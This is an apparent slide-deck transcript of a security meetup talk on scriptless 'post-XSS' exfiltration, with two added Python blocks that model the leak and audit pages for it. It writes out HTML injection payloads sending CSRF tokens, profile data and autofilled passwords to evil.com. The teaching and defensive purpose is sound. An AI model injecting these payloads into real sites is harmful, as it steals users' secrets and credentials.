Postcards from the post-XSS world: Content Exfiltration technique

By: Piyush Pattanayak

Null Chennai Meet
Introduction to XSS
•   A type of injection attack in which malicious scripts are injected into otherwise
    benign and trusted web sites.

•   Occurs when an attacker uses a web application to send malicious code, generally
    in the form of a client-side script, to a different end user.

•   The flaws that allow these attacks to succeed are prevalent in most web applications
    that use user input to generate output without adequate validation or encoding of
    that input.

•   An attacker can use XSS to send a malicious script to an unsuspecting user. The
    end user's browser has no way of determining that the script should not be
    trusted, and will execute it.

•   This gives the malicious script access to cookies and other sensitive
    information retained by the browser for use by the site. Such scripts can also
    rewrite the HTML content of the page.

How to test for XSS
• XSS should be tested in anything that accepts user input and
  displays it in the web page after rendering. XSS attacks succeed
  because most programmers do not apply HTML encoding to user input,
  trusting the input as received.

• E.g.: a user enters "<script>alert(document.cookie)</script>" in
  a text field; upon submission it may be rendered as a script tag,
  producing a popup alert containing the cookies.

• There are plenty of other XSS vectors, and more information about XSS,
  at OWASP.

Introduction to Post-XSS
• What?
   – Very similar to XSS, but it works in script-less environments.

• Why post-XSS?
   – Browser-level efforts to improve the security of web applications focus on the
     containment of attacker-originated scripts.

   – Content Security Policy removes the ability to inline JavaScript code in a
     protected HTML document.

   – Whitelisting of permissible sources for any externally loaded scripts.

   – Related approaches, such as the NoScript add-on, the built-in XSS filters in
     Internet Explorer and Chrome, client-side APIs such as toStaticHTML(...), or the
     HTML sanitizers built into server-side frameworks, also deserve a note.

Content Exfiltration
• The goal of a successful XSS attack is the extraction of user-specific secrets
  from the vulnerable application.

• Historically, XSS exploits sought to obtain HTTP (session) cookies.

• The introduction of HttpOnly cookies greatly limited this possibility.

• In an application where theft of HTTP cookies is not practical, exfiltration
  attempts are usually geared towards the extraction of any of the
  following:
   – Personal data
   – Tokens used to defend against cross-site request forgery attacks
   – Capability-bearing URLs

Several Exfiltration Strategies

•   Dangling markup injection
•   <textarea>-based consumption
•   Rerouting of existing forms
•   Use of <base> to hijack relative URLs
•   Form injection to intercept browser-managed passwords
•   The limits of exfiltration defenses

1. Dangling markup injection
• Injection of non-terminated markup, which will consume a significant
  portion of the subsequent HTML syntax until the expected terminating
  sequence is encountered.

• Opposite quote: the injected attribute is opened with the quote character
  not used by the markup that follows, so only a matching quote further down
  the page terminates it.

• Scenario: we are allowed to inject anything in the HTML content above
  the sensitive data we need to steal.

• Example:
    – <img src='http://evil.com/log.cgi?                  ← Injected line with a non-terminated parameter
      ...
      <input type="hidden" name="xsrf_token" value="12345">
      ...
      '                                                   ← Normally-occurring apostrophe in page text
      ...
      </div>                                              ← The first '>' after the apostrophe ends the injected tag

                                                                                http://nullcon.net/
Dangling markup injection cont..
      • Limitation: the injection point must appear before the sensitive data
        to be extracted.

      • If governed by pure chance, this condition will be met in 50%
        of all cases.

      • Demo: Dangling Markup Injection
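The following is an added example, not code from the slides or from the referenced lcamtuf page: a Python model of the dangling-markup injection above, placed beside the output-encoding fix. It relies on the standard library's html.parser, whose tokenizer, like a browser's, runs a single-quoted attribute value up to the next apostrophe; the page template, the token value and the host attacker.example are constructed.

```python
import html
from html.parser import HTMLParser

# Attributes whose value the browser turns into an outbound request.
URL_ATTRS = {"src", "href", "action", "formaction", "poster"}

# Constructed page: a reflected comment, then the CSRF token, then page text
# that happens to contain an apostrophe ("Here's"). The template's own
# attributes use double quotes, so they do not end a single-quoted value.
PAGE_TEMPLATE = (
    "<html><body>\n"
    '<div class="comment">{comment}</div>\n'
    '<form action="/update_profile.php">\n'
    '<input type="hidden" name="xsrf_token" value="12345">\n'
    "</form>\n"
    "<p>Here's your profile.</p>\n"
    "</body></html>"
)
XSRF_TOKEN = "12345"

# Constructed attacker-controlled input: an <img> whose src attribute is
# opened with an apostrophe and never closed (the slides' dangling markup).
DANGLING_INPUT = "<img src='http://attacker.example/log.cgi?"


class UrlAttrCollector(HTMLParser):
    """Records every URL-bearing attribute value the tokenizer produces."""

    def __init__(self):
        super().__init__()
        self.urls = []  # (tag, attribute name, attribute value)

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in URL_ATTRS and value is not None:
                self.urls.append((tag, name, value))


def render_vulnerable(comment):
    """Reflects user input with no output encoding (the bug on the slides)."""
    return PAGE_TEMPLATE.format(comment=comment)


def render_hardened(comment):
    """Reflects user input after entity-encoding <, >, &, double and single
    quotes, so the browser sees text instead of a new tag."""
    return PAGE_TEMPLATE.format(comment=html.escape(comment, quote=True))


def leaked_urls(document, secret):
    """Returns the URL attribute values that would carry `secret` off-page."""
    collector = UrlAttrCollector()
    collector.feed(document)
    collector.close()
    return [hit for hit in collector.urls if secret in hit[2]]


if __name__ == "__main__":
    for label, render in (("vulnerable", render_vulnerable),
                          ("hardened", render_hardened)):
        hits = leaked_urls(render(DANGLING_INPUT), XSRF_TOKEN)
        print(f"{label}: {len(hits)} URL attribute(s) carry the token")
        for tag, name, value in hits:
            print(f"  <{tag} {name}=...> would request {value!r}")
```

In the vulnerable rendering the whole form, token included, ends up inside the src attribute of the injected image, and the tag only closes at the '>' of the </p> that follows the apostrophe.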

http://null.co.in/                                              http://nullcon.net/
2. <textarea>-based consumption
      • The previous method is limited by the need for a matching quote character.

      • Instead, inject an unclosed <textarea>: everything after it, up to </textarea>
        or the end of the document, becomes the text of the field.

      • Scenario: a mix of single and double quotes appears before the sensitive
        data we want to steal, so a dangling attribute would terminate too early.

      • Can be injected before or after the legitimate form tag.

      • Example:
             – <form action='http://evil.com/log.cgi'><textarea>          ← Injected line
               ... <input type="hidden" name="xsrf_token" value="12345"> ... (EOF)

<textarea>-based consumption cont..
      • Limitation: in contrast to the previous method, a degree of user
        interaction is needed to exfiltrate the data.

      • The victim has to submit the form by some means.

      • Forms with auto-submit capabilities are being considered for HTML5. Such
        a feature may unintentionally assist with the automation of this attack in
        future browsers.

      • Demo: <textarea>-based consumption

3. Rerouting of existing forms
      • This works because <form> tags cannot be nested: a <form> start tag that
        appears while another form is still open is ignored by the parser.

      • Scenario: we can inject anything above an existing form tag.

      • This allows the attacker to change the action URL to which the existing
        form will be submitted.

      • Example:
             – <form action='http://evil.com/log.cgi'>      ← Injected line
               ...
               <form action='update_profile.php'>           ← Legitimate, pre-existing form (ignored by the parser)
               ...
               <input type="text" name="real_name" value="John Q. Public">
               ...
               </form>

Rerouting of existing forms cont..
      • Especially interesting when used to target forms automatically
        populated with user-specific secrets.

      • Demo: Rerouting of existing forms

4. <base> to hijack relative URLs
      • Injection of a <base> tag.

      • Changes the semantics of all subsequently appearing relative URLs.

      • Scenario: we are allowed to insert markup above the form element.

      • Example:
             – <base href='http://evil.com/'>                ← Injected line
               ...
               <form action='update_profile.php'>           ← Legitimate, pre-existing form
               (its action now resolves to http://evil.com/update_profile.php)
               ...
               <input type="text" name="real_name" value="John Q. Public"> ...
               </form>

<base> to hijack relative URLs cont..

      • Demo: <base> to hijack relative URLs

5. Form injection to intercept browser-managed passwords
      • Browsers have features to remember usernames and passwords for
        websites.

      • Browsers auto-fill the fields after matching the domain and the id and name
        attributes of the fields.

      • We can inject a form into the domain using the previous exfiltration techniques
        to steal the user's credentials.

      • Example:
             – <form action="http://www.evil.com" method="POST">
                 <input type="text" id="username" name="username">
                 <input type="password" id="password" name="password">
               </form>

Form injection to intercept browser-managed passwords cont..
      • We can specify GET instead of POST and submit the
        credentials to a selected same-site destination.

      • That destination may link to third-party sites (thus leaking
        the credentials in the Referer header).

      • Or it may echo the parameters in the page.

6. Addendum: The limits of exfiltration defenses
      • All the previous vectors send data to the attacker's domain.

      • A developer may therefore wish to restrict the set of permissible destinations
        for markup such as <form>, <a href=...>, or <img> to his own domain.

      • However, any attempt to prevent exfiltration, even in script-less
        environments, is unlikely to be successful.

      • Exfiltration attempts do not have to be geared toward relaying the data to
        a third-party website.

      • Moving data from a private place to a public place, all within the scope of a
        single website, is also sufficient.

Addendum: The limits of exfiltration defenses cont..

      • Example:
             – <form action='/post_review.php'>
               <input type='hidden' name='review_body' value="      ← Injected lines
               ...
               Your current shipping address:                       ← Existing page text to be exfiltrated
               123 Evergreen Terrace, Springfield, USA
               ...
               <form action="/update_address.php">                  ← Existing form (ignored by the parser)
               ...
               <input type="hidden" name="xsrf_token" value="12345"> ← Token valid for both
                                                                       /update_address.php and /post_review.php
               ...
               </form>


      • Demo: Addendum: The limits of exfiltration defenses
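Added example (not the slides' code) that serves sections 3 to 6: a post-render audit applying the two parser rules the rerouting and <base> vectors depend on, namely that a <form> start tag inside an open form is ignored and that the first <base href> rewrites every later relative URL, and reporting any form that would submit to another origin, marked separately when it carries a password field. The page URL, the markup and the host attacker.example are constructed; the last case shows the addendum's point, since a same-site destination produces no finding.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed: the URL of the page being audited, which fixes its origin.
PAGE_URL = "https://shop.example/account"

# Constructed page: a reflected comment above a legitimate profile form.
PAGE_TEMPLATE = (
    "<html><body>\n"
    '<div class="comment">{injected}</div>\n'
    '<form action="update_profile.php" method="post">\n'
    '<input type="text" name="real_name" value="John Q. Public">\n'
    "</form>\n"
    "</body></html>"
)

# Constructed inputs, one per vector on the slides (attacker.example is a
# placeholder for an attacker-controlled host).
REROUTE_INPUT = '<form action="http://attacker.example/log.cgi">'
BASE_INPUT = '<base href="http://attacker.example/">'
PASSWORD_FORM_INPUT = (
    '<form action="http://attacker.example/" method="post">'
    '<input type="text" id="username" name="username">'
    '<input type="password" id="password" name="password"></form>'
)
# Addendum case: a same-site destination plus a dangling value attribute.
SAME_SITE_INPUT = ('<form action="/post_review.php">'
                   '<input type="hidden" name="review_body" value="')


def origin(url):
    parts = urlsplit(url)
    return parts.scheme.lower(), parts.netloc.lower()


class FormAuditor(HTMLParser):
    """Models two browser rules: only the first <base href> counts, and a
    <form> start tag inside an open form is ignored (the outer action wins)."""

    def __init__(self, page_url):
        super().__init__()
        self.base = page_url
        self.base_seen = False
        self.open_form = None   # [effective action URL, has password field]
        self.forms = []         # closed forms as (action, has_password)
        self.ignored_forms = 0  # nested <form> tags the parser dropped

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "base" and not self.base_seen and a.get("href"):
            self.base = urljoin(self.base, a["href"])
            self.base_seen = True
        elif tag == "form":
            if self.open_form is not None:
                self.ignored_forms += 1
                return
            self.open_form = [urljoin(self.base, a.get("action") or ""), False]
        elif tag == "input" and (a.get("type") or "").lower() == "password":
            if self.open_form is not None:
                self.open_form[1] = True

    def handle_endtag(self, tag):
        if tag == "form" and self.open_form is not None:
            self.forms.append(tuple(self.open_form))
            self.open_form = None

    def close(self):
        super().close()
        if self.open_form is not None:  # form left open at end of document
            self.forms.append(tuple(self.open_form))
            self.open_form = None


def audit_forms(document, page_url=PAGE_URL):
    """Returns (kind, action) for every form that would submit to another
    origin: 'password-form' if it holds a password field, else
    'rerouted-form'. Same-origin forms are never reported."""
    auditor = FormAuditor(page_url)
    auditor.feed(document)
    auditor.close()
    findings = []
    for action, has_password in auditor.forms:
        if origin(action) != origin(page_url):
            kind = "password-form" if has_password else "rerouted-form"
            findings.append((kind, action))
    return findings


if __name__ == "__main__":
    cases = {"benign": "Nice product!", "reroute": REROUTE_INPUT,
             "base": BASE_INPUT, "password form": PASSWORD_FORM_INPUT,
             "same-site (addendum)": SAME_SITE_INPUT}
    for label, injected in cases.items():
        print(label, "->", audit_forms(PAGE_TEMPLATE.format(injected=injected)))
```

Because the check keys on origin, the same-site case returns nothing even though the dangling value attribute swallows the legitimate form, which is exactly the limit the addendum describes.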

Reference

      • http://lcamtuf.coredump.cx/postxss/

Thank You
                       Q&A

http://null.co.in/               http://nullcon.net/

Mais conteúdo relacionado

Mais procurados

Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesseskuza55
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front endErlend Oftedal
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceKrzysztof Kotowicz
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserShreeraj Shah
 
XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hoursnoopythesecuritydog
 
Front end-security
Front end-securityFront end-security
Front end-securityMiao Siyu
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Krzysztof Kotowicz
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)Sam Bowne
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesAbraham Aranguren
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyKrishna T
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)Sam Bowne
 
Client sidesec 2013 - script injection
Client sidesec 2013 - script injectionClient sidesec 2013 - script injection
Client sidesec 2013 - script injectionTal Be'ery
 
Client sidesec 2013 - non js
Client sidesec 2013 - non jsClient sidesec 2013 - non js
Client sidesec 2013 - non jsTal Be'ery
 
CNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side ControlsCNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side ControlsSam Bowne
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveGreenD0g
 
Elegant Rest Design Webinar
Elegant Rest Design WebinarElegant Rest Design Webinar
Elegant Rest Design WebinarStormpath
 
Security vulnerabilities - 2018
Security vulnerabilities - 2018Security vulnerabilities - 2018
Security vulnerabilities - 2018Marius Vorster
 

Mais procurados (20)

Same Origin Policy Weaknesses
Same Origin Policy WeaknessesSame Origin Policy Weaknesses
Same Origin Policy Weaknesses
 
Web Application Security in front end
Web Application Security in front endWeb Application Security in front end
Web Application Security in front end
 
HTML5 hacking
HTML5 hackingHTML5 hacking
HTML5 hacking
 
Something wicked this way comes - CONFidence
Something wicked this way comes - CONFidenceSomething wicked this way comes - CONFidence
Something wicked this way comes - CONFidence
 
Blackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browserBlackhat11 shreeraj reverse_engineering_browser
Blackhat11 shreeraj reverse_engineering_browser
 
XSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hourXSS Primer - Noob to Pro in 1 hour
XSS Primer - Noob to Pro in 1 hour
 
Front end-security
Front end-securityFront end-security
Front end-security
 
Secure java script-for-developers
Secure java script-for-developersSecure java script-for-developers
Secure java script-for-developers
 
Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)Html5: Something wicked this way comes (Hack in Paris)
Html5: Something wicked this way comes (Hack in Paris)
 
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
CNIT 129S: 13: Attacking Users: Other Techniques (Part 1 of 2)
 
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web ServicesXXE Exposed: SQLi, XSS, XXE and XEE against Web Services
XXE Exposed: SQLi, XSS, XXE and XEE against Web Services
 
Browser Internals-Same Origin Policy
Browser Internals-Same Origin PolicyBrowser Internals-Same Origin Policy
Browser Internals-Same Origin Policy
 
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
CNIT 129S: 12: Attacking Users: Cross-Site Scripting (Part 1 of 2)
 
DEfcon15 XXE XXS
DEfcon15 XXE XXSDEfcon15 XXE XXS
DEfcon15 XXE XXS
 
Client sidesec 2013 - script injection
Client sidesec 2013 - script injectionClient sidesec 2013 - script injection
Client sidesec 2013 - script injection
 
Client sidesec 2013 - non js
Client sidesec 2013 - non jsClient sidesec 2013 - non js
Client sidesec 2013 - non js
 
CNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side ControlsCNIT 129S: Ch 5: Bypassing Client-Side Controls
CNIT 129S: Ch 5: Bypassing Client-Side Controls
 
MITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another PerspectiveMITM Attacks on HTTPS: Another Perspective
MITM Attacks on HTTPS: Another Perspective
 
Elegant Rest Design Webinar
Elegant Rest Design WebinarElegant Rest Design Webinar
Elegant Rest Design Webinar
 
Security vulnerabilities - 2018
Security vulnerabilities - 2018Security vulnerabilities - 2018
Security vulnerabilities - 2018
 

Semelhante a Postcards from the post xss world- content exfiltration null

Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Divyanshu
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5DefconRussia
 
Open source security
Open source securityOpen source security
Open source securitylrigknat
 
Web Hacking Series Part 4
Web Hacking Series Part 4Web Hacking Series Part 4
Web Hacking Series Part 4Aditya Kamat
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresRoel Palmaers
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingSam Bowne
 
Html5 security
Html5 securityHtml5 security
Html5 securityKrishna T
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptCyber Security Alliance
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterMichael Coates
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)Kishor Kumar
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingSam Bowne
 
Ch 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSCh 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSSam Bowne
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Krzysztof Kotowicz
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Jeremiah Grossman
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...nooralmousa
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Jeremiah Grossman
 

Semelhante a Postcards from the post xss world- content exfiltration null (20)

Post XSS
Post XSSPost XSS
Post XSS
 
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
Browser Hacking For Fun and Profit | Null Bangalore Meetup 2019 | Divyanshu S...
 
Building Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 FeaturesBuilding Client-Side Attacks with HTML5 Features
Building Client-Side Attacks with HTML5 Features
 
Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5Krzysztof Kotowicz - Hacking HTML5
Krzysztof Kotowicz - Hacking HTML5
 
Open source security
Open source securityOpen source security
Open source security
 
Web Hacking Series Part 4
Web Hacking Series Part 4Web Hacking Series Part 4
Web Hacking Series Part 4
 
Chrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasuresChrome extensions threat analysis and countermeasures
Chrome extensions threat analysis and countermeasures
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
Html5 security
Html5 securityHtml5 security
Html5 security
 
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScriptWarning Ahead: SecurityStorms are Brewing in Your JavaScript
Warning Ahead: SecurityStorms are Brewing in Your JavaScript
 
Cross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning CenterCross Site Scripting - Mozilla Security Learning Center
Cross Site Scripting - Mozilla Security Learning Center
 
Django (Web Applications that are Secure by Default)
Django �(Web Applications that are Secure by Default�)Django �(Web Applications that are Secure by Default�)
Django (Web Applications that are Secure by Default)
 
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site ScriptingCNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
CNIT 129S: Ch 12: Attacking Users: Cross-Site Scripting
 
Ch 12 Attacking Users - XSS
Ch 12 Attacking Users - XSSCh 12 Attacking Users - XSS
Ch 12 Attacking Users - XSS
 
Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)Hacking HTML5 offensive course (Zeronights edition)
Hacking HTML5 offensive course (Zeronights edition)
 
Lets Make our Web Applications Secure
Lets Make our Web Applications SecureLets Make our Web Applications Secure
Lets Make our Web Applications Secure
 
Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008Top Ten Web Hacking Techniques – 2008
Top Ten Web Hacking Techniques – 2008
 
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
Mr. Mohammed Aldoub  - A case study of django web applications that are secur...Mr. Mohammed Aldoub  - A case study of django web applications that are secur...
Mr. Mohammed Aldoub - A case study of django web applications that are secur...
 
Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)Top Ten Web Hacking Techniques (2010)
Top Ten Web Hacking Techniques (2010)
 
New web attacks-nethemba
New web attacks-nethembaNew web attacks-nethemba
New web attacks-nethemba
 

Último

Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLScyllaDB
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 3652toLead Limited
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfAddepto
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr BaganFwdays
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Mattias Andersson
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):comworks
 
SAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxSAP Build Work Zone - Overview L2-L3.pptx
SAP Build Work Zone - Overview L2-L3.pptxNavinnSomaal
 
TrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc Webinar - How to Build Consumer Trust Through Data Privacy
TrustArc Webinar - How to Build Consumer Trust Through Data PrivacyTrustArc
 
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DayH2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo Day
H2O.ai CEO/Founder: Sri Ambati Keynote at Wells Fargo DaySri Ambati
 
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
Transcript: New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024BookNet Canada
 
DSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningDSPy a system for AI to Write Prompts and Do Fine Tuning
DSPy a system for AI to Write Prompts and Do Fine TuningLars Bell
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
Story boards and shot lists for my a level piece
Story boards and shot lists for my a level pieceStory boards and shot lists for my a level piece
Story boards and shot lists for my a level piececharlottematthew16
 
Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Advanced Test Driven-Development @ php[tek] 2024
Advanced Test Driven-Development @ php[tek] 2024Scott Keck-Warren
 
Take control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteTake control of your SAP testing with UiPath Test Suite
Take control of your SAP testing with UiPath Test SuiteDianaGray10
 

Último (20)

Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365Ensuring Technical Readiness For Copilot in Microsoft 365
Ensuring Technical Readiness For Copilot in Microsoft 365
 
Gen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdfGen AI in Business - Global Trends Report 2024.pdf
Gen AI in Business - Global Trends Report 2024.pdf
 
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
New from BookNet Canada for 2024: BNC CataList - Tech Forum 2024
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?Are Multi-Cloud and Serverless Good or Bad?
Are Multi-Cloud and Serverless Good or Bad?
 
CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):CloudStudio User manual (basic edition):
CloudStudio User manual (basic edition):
 
